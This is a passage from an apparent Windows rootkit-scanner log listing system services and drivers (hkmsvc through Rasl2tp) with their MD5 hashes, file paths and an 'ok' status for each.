      22:13:43.0460 2516 hkmsvc - ok
      22:13:43.0495 2516 [ 655D6872C84E05B17215DE8C9C6C8D31 ] HomeGroupListener C:\Windows\system32\ListSvc.dll
      22:13:43.0520 2516 HomeGroupListener - ok
      22:13:43.0620 2516 [ C320F08D0A0D2C29A35700CDD514CB79 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
      22:13:43.0635 2516 HomeGroupProvider - ok
      22:13:43.0670 2516 [ AA045211F03A2BE9BFB16F77CA92769E ] hotcore3 C:\Windows\system32\DRIVERS\hotcore3.sys
      22:13:43.0695 2516 hotcore3 - ok
      22:13:43.0710 2516 [ 91A15EC4471AA8D2A6392C3BCB2D3DC2 ] HpSAMD C:\Windows\system32\DRIVERS\HpSAMD.sys
      22:13:43.0745 2516 HpSAMD - ok
      22:13:43.0770 2516 [ E2F8E8191EE6A7BE008BDE5D5429BC47 ] HTTP C:\Windows\system32\drivers\HTTP.sys
      22:13:43.0795 2516 HTTP - ok
      22:13:43.0820 2516 [ 5E74325B4F0A07E583D2BEC72B3099FB ] hwpolicy C:\Windows\system32\drivers\hwpolicy.sys
      22:13:43.0835 2516 hwpolicy - ok
      22:13:43.0850 2516 [ FF72BE8FE6F69667E2C86111B4EA201B ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys
      22:13:43.0870 2516 i8042prt - ok
      22:13:43.0895 2516 [ AC958B65CDE27ADFDEC628BF7ECCEB8C ] iaStorV C:\Windows\system32\DRIVERS\iaStorV.sys
      22:13:43.0900 2516 iaStorV - ok
      22:13:43.0955 2516 [ FFE589007CB703C958AC6E9051327DD5 ] idsvc C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
      22:13:43.0985 2516 idsvc - ok
      22:13:44.0000 2516 [ 0D530FE77DFEC74C7731CCD30D620021 ] iirsp C:\Windows\system32\DRIVERS\iirsp.sys
      22:13:44.0035 2516 iirsp - ok
      22:13:44.0060 2516 [ 1B9C17C7294D316F9FDE5F9E25A7EEF2 ] IKEEXT C:\Windows\System32\ikeext.dll
      22:13:44.0085 2516 IKEEXT - ok
      22:13:44.0115 2516 [ 5493DEC4821FF89FD31D2E34EB4535AB ] intelide C:\Windows\system32\DRIVERS\intelide.sys
      22:13:44.0120 2516 intelide - ok
      22:13:44.0135 2516 [ 01A44D9FEF87073BF030FA1920000DB0 ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
      22:13:44.0140 2516 intelppm - ok
      22:13:44.0155 2516 [ DCCB0CAAB4B67AF7B34AFA8203674FEF ] IPBusEnum C:\Windows\system32\ipbusenum.dll
      22:13:44.0160 2516 IPBusEnum - ok
      22:13:44.0185 2516 [ DBDE76F5B377EB24A3588FCF789DDF74 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
      22:13:44.0190 2516 IpFilterDriver - ok
      22:13:44.0215 2516 [ 8A19FAE8CFF37B7A8DDB48404728BB38 ] IPMIDRV C:\Windows\system32\DRIVERS\IPMIDrv.sys
      22:13:44.0225 2516 IPMIDRV - ok
      22:13:44.0245 2516 [ 3D3C33D6BF0828324D1813CA3980E0FB ] IPNAT C:\Windows\system32\drivers\ipnat.sys
      22:13:44.0260 2516 IPNAT - ok
      22:13:44.0285 2516 [ 84B500317DF9D2637AC93E44FD461FF5 ] IRENUM C:\Windows\system32\drivers\irenum.sys
      22:13:44.0295 2516 IRENUM - ok
      22:13:44.0310 2516 [ C3B2BCDC1C62EB774C1625F8023671CA ] isapnp C:\Windows\system32\DRIVERS\isapnp.sys
      22:13:44.0320 2516 isapnp - ok
      22:13:44.0345 2516 [ 46390D4F2A6710CD6FFC8D31F5B6453A ] iScsiPrt C:\Windows\system32\DRIVERS\msiscsi.sys
      22:13:44.0350 2516 iScsiPrt - ok
      22:13:44.0370 2516 [ 21D8C59033A6F62DE759236F14BCC693 ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
      22:13:44.0370 2516 kbdclass - ok
      22:13:44.0405 2516 [ 322C47BB688A1250E340CA76C59470BD ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
      22:13:44.0415 2516 kbdhid - ok
      22:13:44.0430 2516 [ 62C4EF46A710A84416AEA89E52C01833 ] KeyIso C:\Windows\system32\lsass.exe
      22:13:44.0435 2516 KeyIso - ok
      22:13:44.0485 2516 [ 94D67D49BD9503BB1D838405D80F2058 ] KL1 C:\Windows\system32\DRIVERS\kl1.sys
      22:13:44.0510 2516 KL1 - ok
      22:13:44.0520 2516 [ 713576569667AC9E0F8556076004A96B ] kl2 C:\Windows\system32\DRIVERS\kl2.sys
      22:13:44.0545 2516 kl2 - ok
      22:13:44.0600 2516 [ 2B7064FF5681B8DDE96B98709BB78884 ] KLIF C:\Windows\system32\DRIVERS\klif.sys
      22:13:44.0635 2516 KLIF - ok
      22:13:44.0665 2516 [ CF88B4985D957EEE45C9939092E87C92 ] KLIM6 C:\Windows\system32\DRIVERS\klim6.sys
      22:13:44.0705 2516 KLIM6 - ok
      22:13:44.0725 2516 [ 3DE1771C135328420315E21DDE229BBA ] klmouflt C:\Windows\system32\DRIVERS\klmouflt.sys
      22:13:44.0745 2516 klmouflt - ok
      22:13:44.0765 2516 [ 8B472D05B520CB300C108D8D3F94BC4A ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
      22:13:44.0770 2516 KSecDD - ok
      22:13:44.0795 2516 [ BBF9CFEA2D3B4049E2CA18B2D6F4A916 ] KSecPkg C:\Windows\system32\Drivers\ksecpkg.sys
      22:13:44.0810 2516 KSecPkg - ok
      22:13:44.0845 2516 [ BBA8BF97FACBDDA25BF8EBBD6E445DE0 ] KtmRm C:\Windows\system32\msdtckrm.dll
      22:13:44.0860 2516 KtmRm - ok
      22:13:44.0895 2516 [ 2570DB1167C6716CFE8EE0DFC13D2B23 ] LanmanServer C:\Windows\system32\srvsvc.dll
      22:13:44.0900 2516 LanmanServer - ok
      22:13:44.0910 2516 [ 70AB6AE64BEABD3BE0966EF4B2958245 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
      22:13:44.0915 2516 LanmanWorkstation - ok
      22:13:44.0930 2516 [ 56B6B12064159094E1DCF3667F338CF4 ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
      22:13:44.0935 2516 lltdio - ok
      22:13:44.0960 2516 [ 831E14CEDA9E717FB2E449EFBEE7C0C0 ] lltdsvc C:\Windows\System32\lltdsvc.dll
      22:13:44.0975 2516 lltdsvc - ok
      22:13:44.0990 2516 [ 629EF99C36A5CDDB9119D43A475F01C1 ] lmhosts C:\Windows\System32\lmhsvc.dll
      22:13:44.0995 2516 lmhosts - ok
      22:13:45.0020 2516 [ E01CD2302BB3B19A50922A05028D3863 ] LSI_FC C:\Windows\system32\DRIVERS\lsi_fc.sys
      22:13:45.0030 2516 LSI_FC - ok
      22:13:45.0045 2516 [ 45A1373EA2E7BF21F77AD88180820FBA ] LSI_SAS C:\Windows\system32\DRIVERS\lsi_sas.sys
      22:13:45.0055 2516 LSI_SAS - ok
      22:13:45.0060 2516 [ B791FD73219AC7C4755FC473BA869D1F ] LSI_SAS2 C:\Windows\system32\DRIVERS\lsi_sas2.sys
      22:13:45.0065 2516 LSI_SAS2 - ok
      22:13:45.0080 2516 [ 3A5BD4B6BBCDB1FDBED48555366B1589 ] LSI_SCSI C:\Windows\system32\DRIVERS\lsi_scsi.sys
      22:13:45.0090 2516 LSI_SCSI - ok
      22:13:45.0095 2516 [ 662A4CC0040557F4EEE8A570479D26D8 ] luafv C:\Windows\system32\drivers\luafv.sys
      22:13:45.0100 2516 luafv - ok
      22:13:45.0120 2516 [ BC0FEDAB2FB20FF4186FF30A8873859F ] Mcx2Svc C:\Windows\system32\Mcx2Svc.dll
      22:13:45.0130 2516 Mcx2Svc - ok
      22:13:45.0140 2516 [ DE749597787DE1ABE22111F6AD8E7087 ] megasas C:\Windows\system32\DRIVERS\megasas.sys
      22:13:45.0140 2516 megasas - ok
      22:13:45.0160 2516 [ A86E92C416C8B31620B08354FE03723E ] MegaSR C:\Windows\system32\DRIVERS\MegaSR.sys
      22:13:45.0165 2516 MegaSR - ok
      22:13:45.0200 2516 Microsoft SharePoint Workspace Audit Service - ok
      22:13:45.0230 2516 [ 8C7587F7D7D3BBF285FD03496E86FE74 ] MlCyMon C:\Windows\system32\DRIVERS\MlCyMon.sys
      22:13:45.0255 2516 MlCyMon - ok
      22:13:45.0270 2516 [ 54DB6EE870DED7959BB65D208C56C6CC ] MlCyMonLD C:\Windows\system32\DRIVERS\MlCyMonLD.sys
      22:13:45.0285 2516 MlCyMonLD - ok
      22:13:45.0300 2516 [ C93856D7B07CA30B7B451CCDE12CF873 ] MMCSS C:\Windows\system32\mmcss.dll
      22:13:45.0300 2516 MMCSS - ok
      22:13:45.0310 2516 [ C4425FC9A1C56340F62DFA3F52173058 ] Modem C:\Windows\system32\drivers\modem.sys
      22:13:45.0315 2516 Modem - ok
      22:13:45.0330 2516 [ C812018B545EC2955CB1CC45E219B316 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
      22:13:45.0335 2516 monitor - ok
      22:13:45.0345 2516 [ 04F4BB4D08F514849C10D842862EE449 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
      22:13:45.0350 2516 mouclass - ok
      22:13:45.0375 2516 [ A6DFF9490F6D8E4C4D14128F7C17E844 ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
      22:13:45.0390 2516 mouhid - ok
      22:13:45.0415 2516 [ F63D287A792C4B0460AB8C621B1391AE ] mountmgr C:\Windows\system32\drivers\mountmgr.sys
      22:13:45.0420 2516 mountmgr - ok
      22:13:45.0430 2516 [ 3431EE8E4F9C95451C03C9737E4DE50A ] mpio C:\Windows\system32\DRIVERS\mpio.sys
      22:13:45.0440 2516 mpio - ok
      22:13:45.0455 2516 [ 1733A3D120E048DFFBA7FD069E2905BA ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
      22:13:45.0460 2516 mpsdrv - ok
      22:13:45.0475 2516 [ B23DA9A2230D146E8F1F1166DF2CD58A ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
      22:13:45.0480 2516 MRxDAV - ok
      22:13:45.0495 2516 [ FE4CAE5A24FE5CC0B29BD215667540E3 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
      22:13:45.0500 2516 mrxsmb - ok
      22:13:45.0520 2516 [ 395A3C217A2AA5A5B83F587748DBE02E ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
      22:13:45.0525 2516 mrxsmb10 - ok
      22:13:45.0535 2516 [ CD39AD66CE15E21C21D8F68F9F56C836 ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
      22:13:45.0540 2516 mrxsmb20 - ok
      22:13:45.0560 2516 [ 1671BC2330B1D68FFA3019CE69FA4D52 ] msahci C:\Windows\system32\DRIVERS\msahci.sys
      22:13:45.0565 2516 msahci - ok
      22:13:45.0580 2516 [ 901EE49B9A6D96E9CCCA0F042644E9C7 ] msdsm C:\Windows\system32\DRIVERS\msdsm.sys
      22:13:45.0585 2516 msdsm - ok
      22:13:45.0605 2516 [ AA5B7711B477FC9C09338E3E2D2F5F52 ] MSDTC C:\Windows\System32\msdtc.exe
      22:13:45.0625 2516 MSDTC - ok
      22:13:45.0655 2516 [ C1EFBA9E63D1477AEDCBD8AB330FA2C6 ] Msfs C:\Windows\system32\drivers\Msfs.sys
      22:13:45.0665 2516 Msfs - ok
      22:13:45.0685 2516 [ 843565B7780ED1FAA02DD5CF7BC69248 ] mshidkmdf C:\Windows\System32\drivers\mshidkmdf.sys
      22:13:45.0690 2516 mshidkmdf - ok
      22:13:45.0715 2516 [ 019898164BA6818B36AAE658C63F5526 ] msisadrv C:\Windows\system32\DRIVERS\msisadrv.sys
      22:13:45.0755 2516 msisadrv - ok
      22:13:45.0785 2516 [ E1CCDAE502B1C218A40A83501CE3B622 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
      22:13:45.0800 2516 MSiSCSI - ok
      22:13:45.0810 2516 msiserver - ok
      22:13:45.0840 2516 [ 1E7E626EA4EB8DB641EE85580FF932E9 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
      22:13:45.0845 2516 MSKSSRV - ok
      22:13:45.0860 2516 [ 9AE3B932985BDEC5D73445B32756A557 ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
      22:13:45.0865 2516 MSPCLOCK - ok
      22:13:45.0880 2516 [ DAA1C9A0AEC832A7E08BC155171255D7 ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
      22:13:45.0885 2516 MSPQM - ok
      22:13:45.0900 2516 [ E4676C45A848928EFA76FA5274C3C97F ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
      22:13:45.0905 2516 MsRPC - ok
      22:13:45.0925 2516 [ 1F1DB11E4755BFF8B08A3957435ED640 ] mssmbios C:\Windows\system32\DRIVERS\mssmbios.sys
      22:13:45.0925 2516 mssmbios - ok
      22:13:45.0945 2516 [ FD465966E3195FDA04A7850BFD28E290 ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
      22:13:45.0955 2516 MSTEE - ok
      22:13:45.0970 2516 [ 3B1DA039DAA9FDD4EA5BDF2133E36DA3 ] MTConfig C:\Windows\system32\DRIVERS\MTConfig.sys
      22:13:45.0980 2516 MTConfig - ok
      22:13:46.0000 2516 [ AB643DE0696B3F03B189D9BF7B44E512 ] Mup C:\Windows\system32\Drivers\mup.sys
      22:13:46.0005 2516 Mup - ok
      22:13:46.0175 2516 [ 9821F54FD943D9E8A5BA56AEBF6297AC ] NanoServiceMain P:\Program Files\Panda Security\Panda Cloud Antivirus\PSANHost.exe
      22:13:46.0180 2516 NanoServiceMain - ok
      22:13:46.0225 2516 [ E4D8D62381F5835EA20C5209F128F79C ] napagent C:\Windows\system32\qagentRT.dll
      22:13:46.0235 2516 napagent - ok
      22:13:46.0265 2516 [ 9E0A867B7CB269996962F0127C9310D4 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
      22:13:46.0285 2516 NativeWifiP - ok
      22:13:46.0320 2516 [ FE0FFC312609BD9EB75E57F930BB0236 ] NDIS C:\Windows\system32\drivers\ndis.sys
      22:13:46.0345 2516 NDIS - ok
      22:13:46.0370 2516 [ E7B95624676C6E6B751C3002226C3F32 ] NdisCap C:\Windows\system32\DRIVERS\ndiscap.sys
      22:13:46.0370 2516 NdisCap - ok
      22:13:46.0390 2516 [ 41544BC6B3CE625DB16E0D6FC2725621 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
      22:13:46.0395 2516 NdisTapi - ok
      22:13:46.0415 2516 [ D063835582EB22E6C3C76D7BDCBD8072 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
      22:13:46.0420 2516 Ndisuio - ok
      22:13:46.0440 2516 [ 84F1D9DC936C59F2F4AC786A8666B777 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
      22:13:46.0445 2516 NdisWan - ok
      22:13:46.0460 2516 [ 9B05F3CC7C291F9F16BC3EF79C1CB781 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
      22:13:46.0465 2516 NDProxy - ok
      22:13:46.0470 2516 [ EEFB90D63A418A0DE50159963F502C8C ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
      22:13:46.0475 2516 NetBIOS - ok
      22:13:46.0505 2516 [ 4962AC7778D659C753E868749BA954DA ] NetBT C:\Windows\system32\DRIVERS\netbt.sys
      22:13:46.0530 2516 NetBT - ok
      22:13:46.0540 2516 [ 62C4EF46A710A84416AEA89E52C01833 ] Netlogon C:\Windows\system32\lsass.exe
      22:13:46.0540 2516 Netlogon - ok
      22:13:46.0580 2516 [ BC5E409E9F8B72EF0D56AC85FC23FDFC ] Netman C:\Windows\System32\netman.dll
      22:13:46.0600 2516 Netman - ok
      22:13:46.0635 2516 [ D22CD77D4F0D63D1169BB35911BFF12D ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
      22:13:46.0680 2516 NetMsmqActivator - ok
      22:13:46.0690 2516 [ D22CD77D4F0D63D1169BB35911BFF12D ] NetPipeActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
      22:13:46.0690 2516 NetPipeActivator - ok
      22:13:46.0720 2516 [ 006E9A81F2B67173779BC410BD0B5EE3 ] netprofm C:\Windows\System32\netprofm.dll
      22:13:46.0765 2516 netprofm - ok
      22:13:46.0775 2516 [ D22CD77D4F0D63D1169BB35911BFF12D ] NetTcpActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
      22:13:46.0780 2516 NetTcpActivator - ok
      22:13:46.0785 2516 [ D22CD77D4F0D63D1169BB35911BFF12D ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
      22:13:46.0785 2516 NetTcpPortSharing - ok
      22:13:46.0800 2516 [ F845566B3C5DABACAFB435F0D07BA0DC ] nfrd960 C:\Windows\system32\DRIVERS\nfrd960.sys
      22:13:46.0805 2516 nfrd960 - ok
      22:13:46.0820 2516 [ 499E826E7356432A18EF7EB1A5161194 ] NlaSvc C:\Windows\System32\nlasvc.dll
      22:13:46.0825 2516 NlaSvc - ok
      22:13:46.0865 2516 [ 7AEA4DF1CA68FD45DD4BBE1F0243CE7F ] NMSAccess32 C:\Windows\system32\NMSAccess32.exe
      22:13:46.0870 2516 NMSAccess32 - ok
      22:13:46.0895 2516 [ CFEE15A88280D369672DA0E378BBC702 ] NNSALPC C:\Windows\system32\DRIVERS\NNSAlpc.sys
      22:13:46.0900 2516 NNSALPC - ok
      22:13:46.0940 2516 [ 2708799ADC223C4412341F0C68D032E3 ] NNSHTTP C:\Windows\system32\DRIVERS\NNSHttp.sys
      22:13:46.0960 2516 NNSHTTP - ok
      22:13:46.0985 2516 [ 533F19056B98D9CCE466B64186905BC1 ] NNSIDS C:\Windows\system32\DRIVERS\NNSIds.sys
      22:13:46.0995 2516 NNSIDS - ok
      22:13:47.0015 2516 [ BF5295EC6F9E4737F891F58FEA879B31 ] NNSNAHSL C:\Windows\system32\DRIVERS\NNSNAHSL.sys
      22:13:47.0020 2516 NNSNAHSL - ok
      22:13:47.0030 2516 [ 1F054C5CA627FCD3983538D74574016B ] NNSPICC C:\Windows\system32\DRIVERS\NNSPicc.sys
      22:13:47.0035 2516 NNSPICC - ok
      22:13:47.0090 2516 [ A15B00ECD15DACFB9DD33F0CE26EE60D ] NNSPIHSW C:\Windows\system32\DRIVERS\NNSPihsw.sys
      22:13:47.0100 2516 NNSPIHSW - ok
      22:13:47.0110 2516 [ 5F8C023775B8F4A0A8FFC93DD0A27285 ] NNSPOP3 C:\Windows\system32\DRIVERS\NNSPop3.sys
      22:13:47.0115 2516 NNSPOP3 - ok
      22:13:47.0125 2516 [ CA541CE4A1FC034EEC8CFD6C155B9D30 ] NNSPROT C:\Windows\system32\DRIVERS\NNSProt.sys
      22:13:47.0135 2516 NNSPROT - ok
      22:13:47.0145 2516 [ 938E8CCC7AC5922F2E3DBDF3E7A3035C ] NNSPRV C:\Windows\system32\DRIVERS\NNSPrv.sys
      22:13:47.0150 2516 NNSPRV - ok
      22:13:47.0160 2516 [ 2458E950F0A0DD9AD08385209B5E1702 ] NNSSMTP C:\Windows\system32\DRIVERS\NNSSmtp.sys
      22:13:47.0165 2516 NNSSMTP - ok
      22:13:47.0185 2516 [ 75D990651236A570C4C80ED56BFB4009 ] NNSSTRM C:\Windows\system32\DRIVERS\NNSStrm.sys
      22:13:47.0200 2516 NNSSTRM - ok
      22:13:47.0220 2516 [ 9D526B79E7D438056ED7D382AB94019A ] NNSTLSC C:\Windows\system32\DRIVERS\NNSTlsc.sys
      22:13:47.0235 2516 NNSTLSC - ok
      22:13:47.0260 2516 [ 373D7B940FE792ACC9D6FC38DB42C705 ] Npfs C:\Windows\system32\drivers\Npfs.sys
      22:13:47.0265 2516 Npfs - ok
      22:13:47.0280 2516 [ C1C48F6496FE20AB17C93ACC5FB51230 ] nsi C:\Windows\system32\nsisvc.dll
      22:13:47.0285 2516 nsi - ok
      22:13:47.0310 2516 [ D65BA02F291B42FA3C2910EE25BF4251 ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
      22:13:47.0315 2516 nsiproxy - ok
      22:13:47.0355 2516 [ B2B1E77C5284C86977115FE9F220843E ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
      22:13:47.0395 2516 Ntfs - ok
      22:13:47.0410 2516 [ 8087231261F187640112C8408AF51BE2 ] Null C:\Windows\system32\drivers\Null.sys
      22:13:47.0415 2516 Null - ok
      22:13:47.0450 2516 [ 0E40EF12BC029FF8B13043F157452C47 ] NVHDA C:\Windows\system32\drivers\nvhda32v.sys
      22:13:47.0485 2516 NVHDA - ok
      22:13:47.0695 2516 [ BD409DE5681C74C1DE51D72427DC202D ] nvlddmkm C:\Windows\system32\DRIVERS\nvlddmkm.sys
      22:13:47.0890 2516 nvlddmkm - ok
      22:13:47.0905 2516 [ 4A5984C5859D951D0B62B7B406AFE357 ] nvraid C:\Windows\system32\DRIVERS\nvraid.sys
      22:13:47.0910 2516 nvraid - ok
      22:13:47.0930 2516 [ 93CF6F974095F7D146AA273F3BF418D7 ] nvstor C:\Windows\system32\DRIVERS\nvstor.sys
      22:13:47.0940 2516 nvstor - ok
      22:13:47.0975 2516 [ E55877BE77A8A31B0416B4E7C3DBE3F2 ] NVSvc C:\Windows\system32\nvvsvc.exe
      22:13:48.0005 2516 NVSvc - ok
      22:13:48.0030 2516 [ 486D929A5B9663412AD136150E282CE0 ] nv_agp C:\Windows\system32\DRIVERS\nv_agp.sys
      22:13:48.0040 2516 nv_agp - ok
      22:13:48.0050 2516 [ E1639EB7C2A107DBDF50E7831E8894CD ] ohci1394 C:\Windows\system32\DRIVERS\ohci1394.sys
      22:13:48.0055 2516 ohci1394 - ok
      22:13:48.0095 2516 [ 9D10F99A6712E28F8ACD5641E3A7EA6B ] ose C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
      22:13:48.0110 2516 ose - ok
      22:13:48.0275 2516 [ 358A9CCA612C68EB2F07DDAD4CE1D8D7 ] osppsvc C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      22:13:48.0360 2516 osppsvc - ok
      22:13:48.0380 2516 [ 8BED935535581695AB89DBC9EA23F39D ] p2pimsvc C:\Windows\system32\pnrpsvc.dll
      22:13:48.0390 2516 p2pimsvc - ok
      22:13:48.0405 2516 [ 0C2C14FE3177A875FD4D61F9205E4811 ] p2psvc C:\Windows\system32\p2psvc.dll
      22:13:48.0415 2516 p2psvc - ok
      22:13:48.0470 2516 [ E655D7DF83780935087CE467074D6094 ] Paragon System Backup Service P:\Program Files\Paragon Software\Paragon Backup and Recovery 10 Suite\program\dbhservice.exe
      22:13:48.0475 2516 Paragon System Backup Service - ok
      22:13:48.0505 2516 [ E04CE1AE8EE500EC19384F3CF00954C1 ] Parport C:\Windows\system32\DRIVERS\parport.sys
      22:13:48.0515 2516 Parport - ok
      22:13:48.0535 2516 [ 54764B4DB6FB45E8D3E433423668DABB ] partmgr C:\Windows\system32\drivers\partmgr.sys
      22:13:48.0540 2516 partmgr - ok
      22:13:48.0550 2516 [ 355A5E5FC03E8E0F59C19DB5E317C118 ] Parvdm C:\Windows\system32\DRIVERS\parvdm.sys
      22:13:48.0555 2516 Parvdm - ok
      22:13:48.0595 2516 [ 3ADB8BD6154A3EF87496E8FCE9C22493 ] pavboot C:\Windows\system32\drivers\pavboot.sys
      22:13:48.0660 2516 pavboot - ok
      22:13:48.0755 2516 [ 797E0BAEE477419EF6B648CE26379036 ] PcaSvc C:\Windows\System32\pcasvc.dll
      22:13:48.0800 2516 PcaSvc - ok
      22:13:48.0855 2516 [ CDE782E594DACFEEF15569CBC4156067 ] pci C:\Windows\system32\DRIVERS\pci.sys
      22:13:48.0890 2516 pci - ok
      22:13:48.0925 2516 [ 991E82771AF4734A42A3020EC8918F12 ] pciide C:\Windows\system32\DRIVERS\pciide.sys
      22:13:48.0930 2516 pciide - ok
      22:13:48.0940 2516 [ F4784355979D8AB8F1475A90B3807863 ] pcmcia C:\Windows\system32\DRIVERS\pcmcia.sys
      22:13:48.0950 2516 pcmcia - ok
      22:13:48.0960 2516 [ EF210BAB813DEA4E655AB0BA6B75BFEF ] pcw C:\Windows\system32\drivers\pcw.sys
      22:13:48.0965 2516 pcw - ok
      22:13:48.0985 2516 [ A470926671F544550FFA49BCC78B5146 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
      22:13:49.0005 2516 PEAUTH - ok
      22:13:49.0070 2516 [ 60C6D00580DA9F31819EF21B56585714 ] PeerDistSvc C:\Windows\system32\peerdistsvc.dll
      22:13:49.0100 2516 PeerDistSvc - ok
      22:13:49.0164 2516 [ 089C24A0F14FFD74F193F2506A34CFEF ] pla C:\Windows\system32\pla.dll
      22:13:49.0217 2516 pla - ok
      22:13:49.0258 2516 [ B0BB948610CF9278AD3127C7CF57AE7A ] PlugPlay C:\Windows\system32\umpnpmgr.dll
      22:13:49.0275 2516 PlugPlay - ok
      22:13:49.0293 2516 [ EC19081F73D4898352DA2355FBD363B8 ] PNRPAutoReg C:\Windows\system32\pnrpauto.dll
      22:13:49.0310 2516 PNRPAutoReg - ok
      22:13:49.0325 2516 [ 8BED935535581695AB89DBC9EA23F39D ] PNRPsvc C:\Windows\system32\pnrpsvc.dll
      22:13:49.0332 2516 PNRPsvc - ok
      22:13:49.0379 2516 [ C489D0C7D9684DCF98DC3F0272131419 ] Polar Daemon C:\Program Files\Polar\Daemon\polard.exe
      22:13:49.0391 2516 Polar Daemon - ok
      22:13:49.0426 2516 [ E468C13473210E4A31E51B7141002D30 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
      22:13:49.0453 2516 PolicyAgent - ok
      22:13:49.0478 2516 [ 32450FF618A1657EC9C6EB10934525EB ] Power C:\Windows\system32\umpo.dll
      22:13:49.0487 2516 Power - ok
      22:13:49.0505 2516 [ B02D495DA64D8D7E9A72CA0E1C4F0D4F ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
      22:13:49.0514 2516 PptpMiniport - ok
      22:13:49.0533 2516 [ 62A8A15AF151D3ABCE5939766B072717 ] Processor C:\Windows\system32\DRIVERS\processr.sys
      22:13:49.0543 2516 Processor - ok
      22:13:49.0568 2516 [ 1C6B69FAB9EBB1989A3B1DE2477400E6 ] ProfSvc C:\Windows\system32\profsvc.dll
      22:13:49.0585 2516 ProfSvc - ok
      22:13:49.0605 2516 [ 62C4EF46A710A84416AEA89E52C01833 ] ProtectedStorage C:\Windows\system32\lsass.exe
      22:13:49.0608 2516 ProtectedStorage - ok
      22:13:49.0632 2516 [ F3E056A00BC553F01216A05A34C769DA ] Psched C:\Windows\system32\DRIVERS\pacer.sys
      22:13:49.0634 2516 Psched - ok
      22:13:49.0673 2516 [ 0B8F3F222E708C7B26EBEE4B04BFAA39 ] PSINAflt C:\Windows\system32\DRIVERS\PSINAflt.sys
      22:13:49.0690 2516 PSINAflt - ok
      22:13:49.0733 2516 [ C0896FB7534E99FF7625E83D011D2C82 ] PSINFile C:\Windows\system32\DRIVERS\PSINFile.sys
      22:13:49.0743 2516 PSINFile - ok
      22:13:49.0786 2516 [ 098396C218550FE9CF0BE15FAF2B4B0F ] PSINKNC C:\Windows\system32\DRIVERS\psinknc.sys
      22:13:49.0805 2516 PSINKNC - ok
      22:13:49.0842 2516 [ FB6121ADA392277D1B4644D8FDA90DAE ] PSINProc C:\Windows\system32\DRIVERS\PSINProc.sys
      22:13:49.0851 2516 PSINProc - ok
      22:13:49.0883 2516 [ 9D20C215078B343456B821D6576B2449 ] PSINProt C:\Windows\system32\DRIVERS\PSINProt.sys
      22:13:49.0889 2516 PSINProt - ok
      22:13:49.0911 2516 [ 476769481841007583875023F7ECC4CA ] PSKMAD C:\Windows\system32\DRIVERS\PSKMAD.sys
      22:13:49.0967 2516 PSKMAD - ok
      22:13:49.0997 2516 [ 86C00481DAE67613C59E32A335D3E363 ] PSUAService P:\Program Files\Panda Security\Panda Cloud Antivirus\PSUAService.exe
      22:13:50.0001 2516 PSUAService - ok
      22:13:50.0056 2516 [ 22889AFB02D1CB51EA1826BCF26AAE29 ] ql2300 C:\Windows\system32\DRIVERS\ql2300.sys
      22:13:50.0098 2516 ql2300 - ok
      22:13:50.0118 2516 [ CFCEA1D2F03309E13DFB22F18DA55F37 ] ql40xx C:\Windows\system32\DRIVERS\ql40xx.sys
      22:13:50.0123 2516 ql40xx - ok
      22:13:50.0143 2516 [ 05B1899846F96DE179DFA69DB0751E9A ] QWAVE C:\Windows\system32\qwave.dll
      22:13:50.0158 2516 QWAVE - ok
      22:13:50.0173 2516 [ CD4BC3923F620AB959788E1C76DAA485 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
      22:13:50.0178 2516 QWAVEdrv - ok
      22:13:50.0203 2516 [ 1E170F4B9930DADB277D413703685C3B ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
      22:13:50.0218 2516 RasAcd - ok
      22:13:50.0233 2516 [ 30279C1FC747B29DEFE67175270A690C ] RasAgileVpn C:\Windows\system32\DRIVERS\AgileVpn.sys
      22:13:50.0238 2516 RasAgileVpn - ok
      22:13:50.0253 2516 [ 54B4C2256E8B56286F2AA2487617C062 ] RasAuto C:\Windows\System32\rasauto.dll
      22:13:50.0258 2516 RasAuto - ok
      22:13:50.0263 2516 [ 6B4C990CE47882821E46249B642E688E ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
